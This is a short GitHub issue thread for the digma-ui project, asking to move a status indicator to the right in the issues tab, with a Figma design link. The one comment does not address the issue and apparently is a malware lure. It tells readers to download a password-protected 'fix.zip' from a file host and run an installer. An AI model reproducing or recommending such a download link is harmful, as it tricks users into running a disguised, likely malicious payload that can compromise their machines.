### ISSUE TITLE
Change location of status indicator to aligned right in issues tab

### ISSUE THREAD

**Issue by doppleware** [digma-ai/digma-ui#1005]
https://www.figma.com/design/MxA95ZHK5NqGX4ptFQljRJ/%E2%AD%90-Design-System-3.0?node-id=10723-101072&t=9kqIb4Lyb9IrIAwF-4

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
